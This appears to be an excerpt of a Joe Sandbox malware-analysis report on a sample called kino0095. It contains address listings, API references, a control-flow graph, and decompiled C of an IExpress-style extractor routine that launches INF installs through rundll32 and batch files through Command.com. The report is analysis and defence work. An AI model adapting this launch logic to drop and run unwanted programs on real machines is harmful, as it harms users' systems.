                                                                                                                                                                                                                                    0x010b3bd9
                                                                                                                                                                                                                                    0x010b3bfd
                                                                                                                                                                                                                                    0x010b3bfd
                                                                                                                                                                                                                                    0x010b3bff
                                                                                                                                                                                                                                    0x010b3c03
                                                                                                                                                                                                                                    0x010b3c03
                                                                                                                                                                                                                                    0x010b3c11
                                                                                                                                                                                                                                    0x010b3c16
                                                                                                                                                                                                                                    0x010b3c19
                                                                                                                                                                                                                                    0x010b3c28
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3c30
                                                                                                                                                                                                                                    0x010b3c39
                                                                                                                                                                                                                                    0x010b3c40
                                                                                                                                                                                                                                    0x010b3d13
                                                                                                                                                                                                                                    0x010b3d15
                                                                                                                                                                                                                                    0x010b3d21
                                                                                                                                                                                                                                    0x010b3d26
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3c4f
                                                                                                                                                                                                                                    0x010b3c56
                                                                                                                                                                                                                                    0x010b3c60
                                                                                                                                                                                                                                    0x010b3c65
                                                                                                                                                                                                                                    0x010b3c77
                                                                                                                                                                                                                                    0x010b3c78
                                                                                                                                                                                                                                    0x010b3c7c
                                                                                                                                                                                                                                    0x010b3c7e
                                                                                                                                                                                                                                    0x010b3c82
                                                                                                                                                                                                                                    0x010b3c82
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3c7c
                                                                                                                                                                                                                                    0x010b3c67
                                                                                                                                                                                                                                    0x010b3c69
                                                                                                                                                                                                                                    0x010b3c6d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3c58
                                                                                                                                                                                                                                    0x010b3c58
                                                                                                                                                                                                                                    0x010b3c6e
                                                                                                                                                                                                                                    0x010b3c6e
                                                                                                                                                                                                                                    0x010b3c87
                                                                                                                                                                                                                                    0x010b3c89
                                                                                                                                                                                                                                    0x010b3d4d
                                                                                                                                                                                                                                    0x010b3d4f
                                                                                                                                                                                                                                    0x010b3d50
                                                                                                                                                                                                                                    0x010b3d52
                                                                                                                                                                                                                                    0x010b3d9e
                                                                                                                                                                                                                                    0x010b3da8
                                                                                                                                                                                                                                    0x010b3daf
                                                                                                                                                                                                                                    0x010b3db4
                                                                                                                                                                                                                                    0x010b3db6
                                                                                                                                                                                                                                    0x010b3f4d
                                                                                                                                                                                                                                    0x010b3f4d
                                                                                                                                                                                                                                    0x010b3f4f
                                                                                                                                                                                                                                    0x010b3f56
                                                                                                                                                                                                                                    0x010b3f57
                                                                                                                                                                                                                                    0x010b3f58
                                                                                                                                                                                                                                    0x010b3f63
                                                                                                                                                                                                                                    0x010b3f63
                                                                                                                                                                                                                                    0x010b3dbc
                                                                                                                                                                                                                                    0x010b3dc0
                                                                                                                                                                                                                                    0x010b3dc2
                                                                                                                                                                                                                                    0x010b3de6
                                                                                                                                                                                                                                    0x010b3de6
                                                                                                                                                                                                                                    0x010b3de8
                                                                                                                                                                                                                                    0x010b3f0b
                                                                                                                                                                                                                                    0x010b3f0b
                                                                                                                                                                                                                                    0x010b3f0f
                                                                                                                                                                                                                                    0x010b3f13
                                                                                                                                                                                                                                    0x010b3f15
                                                                                                                                                                                                                                    0x010b3f1a
                                                                                                                                                                                                                                    0x010b3f1c
                                                                                                                                                                                                                                    0x010b3f46
                                                                                                                                                                                                                                    0x010b3f47
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3f47
                                                                                                                                                                                                                                    0x010b3f1e
                                                                                                                                                                                                                                    0x010b3f1f
                                                                                                                                                                                                                                    0x010b3f25
                                                                                                                                                                                                                                    0x010b3f26
                                                                                                                                                                                                                                    0x010b3f2a
                                                                                                                                                                                                                                    0x010b3f2d
                                                                                                                                                                                                                                    0x010b3fd9
                                                                                                                                                                                                                                    0x010b3fd9
                                                                                                                                                                                                                                    0x010b3fda
                                                                                                                                                                                                                                    0x010b3fda
                                                                                                                                                                                                                                    0x010b3fe1
                                                                                                                                                                                                                                    0x010b3fe3
                                                                                                                                                                                                                                    0x010b3fe3
                                                                                                                                                                                                                                    0x010b3fe8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3fe8
                                                                                                                                                                                                                                    0x010b3f33
                                                                                                                                                                                                                                    0x010b3f37
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3f37
                                                                                                                                                                                                                                    0x010b3dee
                                                                                                                                                                                                                                    0x010b3dee
                                                                                                                                                                                                                                    0x010b3df5
                                                                                                                                                                                                                                    0x010b3fad
                                                                                                                                                                                                                                    0x010b3fb9
                                                                                                                                                                                                                                    0x010b3fc2
                                                                                                                                                                                                                                    0x010b3fc8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3fc8
                                                                                                                                                                                                                                    0x010b3dfb
                                                                                                                                                                                                                                    0x010b3dfd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3e03
                                                                                                                                                                                                                                    0x010b3e0a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3e15
                                                                                                                                                                                                                                    0x010b3e17
                                                                                                                                                                                                                                    0x010b3e19
                                                                                                                                                                                                                                    0x010b3f94
                                                                                                                                                                                                                                    0x010b3fa4
                                                                                                                                                                                                                                    0x010b3f7c
                                                                                                                                                                                                                                    0x010b3f80
                                                                                                                                                                                                                                    0x010b3f8b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3f8b
                                                                                                                                                                                                                                    0x010b3e2c
                                                                                                                                                                                                                                    0x010b3e30
                                                                                                                                                                                                                                    0x010b3e34
                                                                                                                                                                                                                                    0x010b3e36
                                                                                                                                                                                                                                    0x010b3f69
                                                                                                                                                                                                                                    0x010b3f6e
                                                                                                                                                                                                                                    0x010b3f70
                                                                                                                                                                                                                                    0x010b3f76
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3f76
                                                                                                                                                                                                                                    0x010b3e3c
                                                                                                                                                                                                                                    0x010b3e43
                                                                                                                                                                                                                                    0x010b3e47
                                                                                                                                                                                                                                    0x010b3e52
                                                                                                                                                                                                                                    0x010b3e56
                                                                                                                                                                                                                                    0x010b3e5c
                                                                                                                                                                                                                                    0x010b3e61
                                                                                                                                                                                                                                    0x010b3e68
                                                                                                                                                                                                                                    0x010b3e70
                                                                                                                                                                                                                                    0x010b3e74
                                                                                                                                                                                                                                    0x010b3e7c
                                                                                                                                                                                                                                    0x010b3e80
                                                                                                                                                                                                                                    0x010b3e82
                                                                                                                                                                                                                                    0x010b3e82
                                                                                                                                                                                                                                    0x010b3e87
                                                                                                                                                                                                                                    0x010b3e87
                                                                                                                                                                                                                                    0x010b3e8b
                                                                                                                                                                                                                                    0x010b3e91
                                                                                                                                                                                                                                    0x010b3e94
                                                                                                                                                                                                                                    0x010b3e96
                                                                                                                                                                                                                                    0x010b3e96
                                                                                                                                                                                                                                    0x010b3e9b
                                                                                                                                                                                                                                    0x010b3e9b
                                                                                                                                                                                                                                    0x010b3e9f
                                                                                                                                                                                                                                    0x010b3ea2
                                                                                                                                                                                                                                    0x010b3ea4
                                                                                                                                                                                                                                    0x010b3ea4
                                                                                                                                                                                                                                    0x010b3ea9
                                                                                                                                                                                                                                    0x010b3ea9
                                                                                                                                                                                                                                    0x010b3ead
                                                                                                                                                                                                                                    0x010b3eb3
                                                                                                                                                                                                                                    0x010b3eb6
                                                                                                                                                                                                                                    0x010b3eb8
                                                                                                                                                                                                                                    0x010b3eb8
                                                                                                                                                                                                                                    0x010b3ebd
                                                                                                                                                                                                                                    0x010b3ebd
                                                                                                                                                                                                                                    0x010b3ec1
                                                                                                                                                                                                                                    0x010b3ec3
                                                                                                                                                                                                                                    0x010b3ec5
                                                                                                                                                                                                                                    0x010b3ec5
                                                                                                                                                                                                                                    0x010b3eca
                                                                                                                                                                                                                                    0x010b3eca
                                                                                                                                                                                                                                    0x010b3ece
                                                                                                                                                                                                                                    0x010b3ed5
                                                                                                                                                                                                                                    0x010b3ed9
                                                                                                                                                                                                                                    0x010b3ee0
                                                                                                                                                                                                                                    0x010b3ee6
                                                                                                                                                                                                                                    0x010b3eea
                                                                                                                                                                                                                                    0x010b3eec
                                                                                                                                                                                                                                    0x010b3eee
                                                                                                                                                                                                                                    0x010b3ef3
                                                                                                                                                                                                                                    0x010b3ef3
                                                                                                                                                                                                                                    0x010b3ef5
                                                                                                                                                                                                                                    0x010b3efa
                                                                                                                                                                                                                                    0x010b3efb
                                                                                                                                                                                                                                    0x010b3efd
                                                                                                                                                                                                                                    0x010b3f40
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3eff
                                                                                                                                                                                                                                    0x010b3eff
                                                                                                                                                                                                                                    0x010b3f05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3f05
                                                                                                                                                                                                                                    0x010b3efd
                                                                                                                                                                                                                                    0x010b3dc7
                                                                                                                                                                                                                                    0x010b3dce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3dd0
                                                                                                                                                                                                                                    0x010b3dd7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3dd9
                                                                                                                                                                                                                                    0x010b3ddb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3ddd
                                                                                                                                                                                                                                    0x010b3de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3de1
                                                                                                                                                                                                                                    0x010b3d59
                                                                                                                                                                                                                                    0x010b3d65
                                                                                                                                                                                                                                    0x010b3d6a
                                                                                                                                                                                                                                    0x010b3d6c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3d6e
                                                                                                                                                                                                                                    0x010b3d75
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3d8f
                                                                                                                                                                                                                                    0x010b3d96
                                                                                                                                                                                                                                    0x010b3d98
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3d98
                                                                                                                                                                                                                                    0x010b3c8f
                                                                                                                                                                                                                                    0x010b3c98
                                                                                                                                                                                                                                    0x010b3cf1
                                                                                                                                                                                                                                    0x010b3cf3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3cfe
                                                                                                                                                                                                                                    0x010b3d11
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3d11
                                                                                                                                                                                                                                    0x010b3c9c
                                                                                                                                                                                                                                    0x010b3ca5
                                                                                                                                                                                                                                    0x010b3ca7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3cad
                                                                                                                                                                                                                                    0x010b3cb2
                                                                                                                                                                                                                                    0x010b3cb7
                                                                                                                                                                                                                                    0x010b3cc5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3ce8
                                                                                                                                                                                                                                    0x010b3cec
                                                                                                                                                                                                                                    0x010b3ced
                                                                                                                                                                                                                                    0x010b3ced
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3ce8
                                                                                                                                                                                                                                    0x010b3c9e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3c9e
                                                                                                                                                                                                                                    0x010b3c56
                                                                                                                                                                                                                                    0x010b3d35
                                                                                                                                                                                                                                    0x010b3d35
                                                                                                                                                                                                                                    0x010b3d3c
                                                                                                                                                                                                                                    0x010b3d48
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3d48
                                                                                                                                                                                                                                    0x010b3c03
                                                                                                                                                                                                                                    0x010b3be2
                                                                                                                                                                                                                                    0x010b3be7
                                                                                                                                                                                                                                    0x010b3bee
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 010B3C11
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 010B3CDC
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
                                                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,010B8C42), ref: 010B3D8F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 010B3E26
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,010B8C42), ref: 010B3EFF
                                                                                                                                                                                                                                    • LocalFree.KERNELBASE(?,?,?,?,010B8C42), ref: 010B3F1F
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,010B8C42), ref: 010B3F40
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,010B8C42), ref: 010B3F47
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,010B8C42), ref: 010B3F76
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,010B8C42), ref: 010B3F80
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,010B8C42), ref: 010B3FC2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$doza2
                                                                                                                                                                                                                                    • API String ID: 1032054927-1863140292
                                                                                                                                                                                                                                    • Opcode ID: 34cb9c74255fb041221b107135419bfd0725242cb40742e5754bce9b0692718b
                                                                                                                                                                                                                                    • Instruction ID: f48e0d8a8b42efb75fc30505783283265b411964d1cf3b77778fe452d4dd8148
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34cb9c74255fb041221b107135419bfd0725242cb40742e5754bce9b0692718b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEB1B4706043029BE7709F28D4C5BEB7AE8FB84744F20492EFAD5DA291D775C844C796
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 141 10b1ae8-10b1b2c call 10b1680 144 10b1b3b-10b1b40 141->144 145 10b1b2e-10b1b39 141->145 146 10b1b46-10b1b61 call 10b1a84 144->146 145->146 149 10b1b9f-10b1bc2 call 10b1781 call 10b658a 146->149 150 10b1b63-10b1b65 146->150 159 10b1bc7-10b1bd3 call 10b66c8 149->159 152 10b1b68-10b1b6d 150->152 152->152 154 10b1b6f-10b1b74 152->154 154->149 155 10b1b76-10b1b7b 154->155 157 10b1b7d-10b1b81 155->157 158 10b1b83-10b1b86 155->158 157->158 160 10b1b8c-10b1b9d call 10b1680 157->160 158->149 161 10b1b88-10b1b8a 158->161 166 10b1bd9-10b1bf1 CompareStringA 159->166 167 10b1d73-10b1d7f call 10b66c8 159->167 160->159 161->149 161->160 166->167 169 10b1bf7-10b1c07 GetFileAttributesA 166->169 174 10b1df8-10b1e09 LocalAlloc 167->174 175 10b1d81-10b1d99 CompareStringA 167->175 170 10b1c0d-10b1c15 169->170 171 10b1d53-10b1d5e 169->171 170->171 173 10b1c1b-10b1c33 call 10b1a84 170->173 176 10b1d64-10b1d6e call 10b44b9 171->176 187 10b1c50-10b1c61 LocalAlloc 173->187 188 10b1c35-10b1c38 173->188 179 10b1e0b-10b1e1b GetFileAttributesA 174->179 180 10b1dd4-10b1ddf 174->180 175->174 178 10b1d9b-10b1da2 175->178 192 10b1e94-10b1ea4 call 10b6ce0 176->192 183 10b1da5-10b1daa 178->183 184 10b1e1d-10b1e1f 179->184 185 10b1e67-10b1e73 call 10b1680 179->185 180->176 183->183 189 10b1dac-10b1db4 183->189 184->185 191 10b1e21-10b1e3e call 10b1781 184->191 198 10b1e78-10b1e84 call 10b2aac 185->198 187->180 197 10b1c67-10b1c72 187->197 194 10b1c3a 188->194 195 10b1c40-10b1c4b call 10b1a84 188->195 196 10b1db7-10b1dbc 189->196 191->198 207 10b1e40-10b1e43 191->207 194->195 195->187 196->196 202 10b1dbe-10b1dd2 LocalAlloc 196->202 203 10b1c79-10b1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 197->203 204 10b1c74 197->204 211 10b1e89-10b1e92 198->211 202->180 208 10b1de1-10b1df3 call 10b171e 202->208 209 10b1cf8-10b1d07 203->209 210 10b1cc2-10b1ccc 203->210 204->203 207->198 212 10b1e45-10b1e65 call 10b16b3 * 2 207->212 208->211 213 10b1d09-10b1d21 GetShortPathNameA 209->213 214 10b1d23 209->214 216 10b1cce 210->216 217 10b1cd3-10b1cf3 call 10b1680 * 2 210->217 211->192 212->198 219 10b1d28-10b1d2b 213->219 214->219 216->217 217->211 224 10b1d2d 219->224 225 10b1d32-10b1d4e call 10b171e 219->225 224->225 225->211
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E010B1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t59;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0x10b8004; // 0x72151d89
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E010B1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E010B1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E010B1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
					E010B658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E010B1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E010B66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E010B66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t59 = LocalAlloc(0x40, 0x400); // executed
								_t156 = _t59;
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E010B1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E010B1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E010B16B3( &_v1552, 0x400, " ");
										E010B16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E010B2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E010B171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E010B1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E010B1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E010B44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x10b9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10b1140, _t156, 8,  &_v268) == 0) {
										 *0x10b9a34 =  *0x10b9a34 & 0xfffffffb;
										if( *0x10b9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E010B171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x10b9a34 =  *0x10b9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E010B1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E010B1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E010B6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}















































                                                                                                                                                                                                                                    0x010b1af3
                                                                                                                                                                                                                                    0x010b1afa
                                                                                                                                                                                                                                    0x010b1b07
                                                                                                                                                                                                                                    0x010b1b09
                                                                                                                                                                                                                                    0x010b1b1a
                                                                                                                                                                                                                                    0x010b1b20
                                                                                                                                                                                                                                    0x010b1b2c
                                                                                                                                                                                                                                    0x010b1b3b
                                                                                                                                                                                                                                    0x010b1b40
                                                                                                                                                                                                                                    0x010b1b2e
                                                                                                                                                                                                                                    0x010b1b2e
                                                                                                                                                                                                                                    0x010b1b33
                                                                                                                                                                                                                                    0x010b1b33
                                                                                                                                                                                                                                    0x010b1b46
                                                                                                                                                                                                                                    0x010b1b4c
                                                                                                                                                                                                                                    0x010b1b52
                                                                                                                                                                                                                                    0x010b1b57
                                                                                                                                                                                                                                    0x010b1b5d
                                                                                                                                                                                                                                    0x010b1b61
                                                                                                                                                                                                                                    0x010b1b9f
                                                                                                                                                                                                                                    0x010b1b9f
                                                                                                                                                                                                                                    0x010b1bb1
                                                                                                                                                                                                                                    0x010b1bc2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1b63
                                                                                                                                                                                                                                    0x010b1b63
                                                                                                                                                                                                                                    0x010b1b65
                                                                                                                                                                                                                                    0x010b1b68
                                                                                                                                                                                                                                    0x010b1b68
                                                                                                                                                                                                                                    0x010b1b6a
                                                                                                                                                                                                                                    0x010b1b6b
                                                                                                                                                                                                                                    0x010b1b6f
                                                                                                                                                                                                                                    0x010b1b74
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1b76
                                                                                                                                                                                                                                    0x010b1b7b
                                                                                                                                                                                                                                    0x010b1b86
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1b8c
                                                                                                                                                                                                                                    0x010b1b8c
                                                                                                                                                                                                                                    0x010b1b98
                                                                                                                                                                                                                                    0x010b1bc7
                                                                                                                                                                                                                                    0x010b1bc9
                                                                                                                                                                                                                                    0x010b1bcc
                                                                                                                                                                                                                                    0x010b1bd3
                                                                                                                                                                                                                                    0x010b1d75
                                                                                                                                                                                                                                    0x010b1d76
                                                                                                                                                                                                                                    0x010b1d78
                                                                                                                                                                                                                                    0x010b1d7f
                                                                                                                                                                                                                                    0x010b1dff
                                                                                                                                                                                                                                    0x010b1e05
                                                                                                                                                                                                                                    0x010b1e09
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1e12
                                                                                                                                                                                                                                    0x010b1e1b
                                                                                                                                                                                                                                    0x010b1e73
                                                                                                                                                                                                                                    0x010b1e21
                                                                                                                                                                                                                                    0x010b1e21
                                                                                                                                                                                                                                    0x010b1e28
                                                                                                                                                                                                                                    0x010b1e37
                                                                                                                                                                                                                                    0x010b1e3e
                                                                                                                                                                                                                                    0x010b1e52
                                                                                                                                                                                                                                    0x010b1e60
                                                                                                                                                                                                                                    0x010b1e60
                                                                                                                                                                                                                                    0x010b1e3e
                                                                                                                                                                                                                                    0x010b1e79
                                                                                                                                                                                                                                    0x010b1e7b
                                                                                                                                                                                                                                    0x010b1e84
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b1d9b
                                                                                                                                                                                                                                    0x010b1d9b
                                                                                                                                                                                                                                    0x010b1da0
                                                                                                                                                                                                                                    0x010b1da2
                                                                                                                                                                                                                                    0x010b1da5
                                                                                                                                                                                                                                    0x010b1da5
